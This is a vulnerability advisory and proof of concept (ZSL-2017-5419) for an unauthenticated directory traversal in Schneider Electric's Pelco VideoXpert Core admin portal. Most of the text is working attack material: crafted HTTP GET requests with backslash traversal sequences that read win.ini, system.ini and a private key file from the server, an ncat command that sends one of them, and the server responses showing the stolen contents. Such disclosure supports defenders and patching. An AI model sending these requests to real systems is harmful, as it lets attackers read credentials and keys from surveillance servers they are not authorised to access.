Schneider Electric Pelco VideoXpert Core Admin Portal Directory Traversal Vendor: Schneider Electric SE Product web page: https://www.pelco.com Affected version: 2.0.41 1.14.7 1.12.105 Summary: VideoXpert is a video management solution designed for scalability, fitting the needs surveillance operations of any size. VideoXpert Ultimate can also aggregate other VideoXpert systems, tying multiple video management systems into a single interface. Desc: Pelco VideoXpert suffers from a directory traversal vulnerability. Exploiting this issue will allow an unauthenticated attacker to view arbitrary files within the context of the web server. Tested on: Microsoft Windows 7 Professional SP1 (EN) Jetty(9.2.6.v20141205) MongoDB/3.2.10 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2017-5419 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5419.php 05.04.2017 -- PoC: ---- GET /portal//..\\\..\\\..\\\..\\\windows\win.ini HTTP/1.1 Host: 172.19.0.198 Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close HTTP/1.1 200 OK Date: Wed, 05 Apr 2017 13:27:39 GMT Last-Modified: Tue, 14 Jul 2009 05:09:22 GMT Cache-Control: public, max-age=86400 Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding ETag: 1247548162000 Content-Length: 403 Connection: close ; for 16-bit app support [fonts] [extensions] [mci extensions] [files] [Mail] MAPI=1 [MCI Extensions.BAK] 3g2=MPEGVideo 3gp=MPEGVideo 3gp2=MPEGVideo 3gpp=MPEGVideo aac=MPEGVideo adt=MPEGVideo adts=MPEGVideo m2t=MPEGVideo m2ts=MPEGVideo m2v=MPEGVideo m4a=MPEGVideo m4v=MPEGVideo mod=MPEGVideo mov=MPEGVideo mp4=MPEGVideo mp4v=MPEGVideo mts=MPEGVideo ts=MPEGVideo tts=MPEGVideo ------ GET /portal//..\\\..\\\..\\\..\\\ProgramData\Pelco\Core\db\security\key.pem HTTP/1.1 Host: 172.19.0.198 Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close HTTP/1.1 200 OK Date: Thu, 06 Apr 2017 11:59:07 GMT Last-Modified: Wed, 05 Apr 2017 12:58:36 GMT Cache-Control: public, max-age=86400 Content-Type: text/html; charset=UTF-8 ETag: 1491397116000 Content-Length: 9 Connection: close T0ps3cret ------ bash-4.4$ cat pelco_system_ini.txt GET /portal//..\\\..\\\..\\\..\\\windows\system.ini HTTP/1.1 Host: 172.19.0.198 Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close bash-4.4$ ncat -v -n 172.19.0.198 80 < pelco_system_ini.txt Ncat: Version 7.40 ( https://nmap.org/ncat ) Ncat: Connected to 172.19.0.198:80. HTTP/1.1 200 OK Date: Thu, 06 Apr 2017 12:30:01 GMT Last-Modified: Wed, 10 Jun 2009 21:08:04 GMT Cache-Control: public, max-age=86400 Content-Type: text/html; charset=UTF-8 ETag: 1244668084000 Content-Length: 219 Connection: close ; for 16-bit app support [386Enh] woafont=dosapp.fon EGA80WOA.FON=EGA80WOA.FON EGA40WOA.FON=EGA40WOA.FON CGA80WOA.FON=CGA80WOA.FON CGA40WOA.FON=CGA40WOA.FON [drivers] wave=mmdrv.dll timer=timer.drv [mci] Ncat: 220 bytes sent, 460 bytes received in 0.03 seconds. bash-4.4$